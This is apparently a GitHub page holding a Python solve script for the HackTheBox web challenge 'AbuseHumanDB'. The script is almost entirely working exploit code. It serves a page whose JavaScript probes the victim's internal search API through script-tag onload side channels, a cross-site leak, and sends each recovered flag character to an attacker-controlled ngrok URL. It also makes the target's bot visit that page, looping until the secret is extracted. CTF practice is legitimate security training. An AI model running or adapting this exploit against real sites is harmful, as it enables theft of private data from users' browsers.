HackTheBox-scripts/Challenges/Web/AbuseHumanDB/solve.py at main · 7Rocky/HackTheBox-scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python3

import logging
import requests

from flask import Flask, request
from pwn import log, sys, threading
from urllib.parse import unquote

logging.getLogger('werkzeug').disabled = True
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *_: None

if len(sys.argv) != 3:
    log.error(f'Usage: python3 {sys.argv[0]} <victim-url> <ngrok-url>')

victim_url = sys.argv[1]
ngrok_url = sys.argv[2]

flag = 'HTB{'

app = Flask(__name__)


@app.route('/')
def index():
    global flag

    if request.query_string != b'':
        flag = unquote(request.query_string.decode()[5:])
        return ''

    return f'''<!doctype html>
<html>
  <head></head>
  <body>
    <script>
      const flag = '{flag}'
      const characters = '}}0123456789abcdefghijklmnopqrstuvwxyz!#$@'.split('')

      for (const c of characters) {{
        const s = document.createElement('script')
        s.src = 'http://127.0.0.1:1337/api/entries/search?q=' + encodeURIComponent(flag + c)
        s.onload = () => location.href = '{ngrok_url}?flag=' + encodeURIComponent(flag + c)
        document.head.appendChild(s)
      }}
    </script>
  </body>
</html>
'''


def main():
    global flag

    threading.Thread(target=lambda: app.run(
        host='0.0.0.0', port=80, debug=False, use_reloader=False)).start()

    flag_progress = log.progress('Flag')

    while '}' not in flag:
        previous_flag = flag
        requests.post(f'{victim_url}/api/entries', json={'url': ngrok_url})

        if flag == previous_flag:
            flag += '_'

        flag_progress.status(flag)

    flag_progress.success(flag)


if __name__ == '__main__':
    main()